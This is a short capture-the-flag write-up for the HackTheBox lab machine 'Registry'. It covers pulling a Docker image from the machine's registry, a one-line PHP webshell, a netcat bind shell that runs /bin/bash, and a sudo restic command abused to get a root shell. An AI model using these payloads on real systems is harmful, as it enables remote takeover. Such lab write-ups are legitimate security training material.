Registry @ HackTheBox

Registry @ HackTheBox

Registry is a 40-point machine on HackTheBox that involves interacting with a docker registry to download a docker image and finding a password and ssh private key inside. For root we exploit a flaw in bolt cms to upload a webshell and then abuse a sudo entry that allows us to start restic backup as root.



  "insecure-registries" : ["docker.registry.htb:80"]


sudo systemctl restart docker
docker login docker.registry.htb:80
docker pull docker.registry.htb:80/bolt-image:latest
docker image ls
docker image inspect <image id>

bolt webshell:

<?php echo system($_REQUEST['xcmd']);?>
http://registry.htb/bolt/files/xct.php?xcmd=nc.traditional+-lp+2000+-e /bin/bash

restic docs:

restic exploit:

sudo /usr/bin/restic backup -r rest/ -r sftp:bolt@ -o sftp.command="nc.traditional -lp 2000 -e /bin/bash" /proc/version

Share this post